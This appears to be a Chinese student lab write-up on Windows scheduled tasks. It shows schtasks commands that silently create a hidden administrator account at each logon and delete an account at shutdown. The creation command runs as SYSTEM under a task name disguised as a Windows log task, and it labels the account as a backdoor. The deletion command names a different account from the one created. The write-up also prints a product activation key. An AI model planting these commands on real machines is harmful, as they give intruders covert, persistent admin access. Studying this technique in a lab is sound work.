网络攻防任务二：开机、关机事件触发帐户的建立与删除

 

1、任务要求

设计一个以开机、关机事件为触发条件的计划任务，实现:

一、开机时新建一个用户

二、关机时删除用户

 

 

2、解决步骤

（一）实验环境搭建

事件触发的命令是schtasks。

利用schtasks完成的功能主要是：利用肯定的日志事件触发net user命令，以达到新增一个管理员帐户的目的。

若是利用传统的at命令，首先没法用日志事件触发，其次须要执行多条命令行时，只能将它们编写成.bat的批处理文件进行处理。

 

因为要用到事件触发，xp没有这个功能，因此要新建一个win7的虚拟机。

Win7激活秘钥为YKHFT KW986 GK4PY FDWYH 7TP9F

 

（二）开机建立用户

Schtasks的用法描述:

 

    容许管理员建立、删除、查询、更改、运行和停止本地或远程系统上的计划任

    务。

 

参数列表:

    /Create         建立新计划任务。

 

    /Delete         删除计划任务。

 

    /Query          显示全部计划任务。

 

    /Change         更改计划任务属性。

 

    /Run            按需运行计划任务。

 

    /End            停止当前正在运行的计划任务。

 

    /ShowSid        显示与计划的任务名称相应的安全标识符。

 

    /?              显示此帮助消息。

 

Examples:

    SCHTASKS

    SCHTASKS /?

    SCHTASKS /Run /?

    SCHTASKS /End /?

    SCHTASKS /Create /?

    SCHTASKS /Delete /?

    SCHTASKS /Query  /?

    SCHTASKS /Change /?

    SCHTASKS /ShowSid /?

 

开机事件的事件ID为4624，所以代码以下：

schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"

直接在命令行窗口下输入这行代码便可。

 

 

 

 

 

 

 

 

重启的时候有登陆窗口，缘由是关机的时候帐户未删。

 

 

 

 

 

（三）关机删除用户

经查询关机事件ID为1074。

代码以下：

schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"

关机以前先检查一下帐户状况

 

 

 

 

 

重启以后，结果以下图所示，帐户已被删除。

 

 

 

 

开机后，再输入net user，能够看到帐户在开机以后也创建成功了。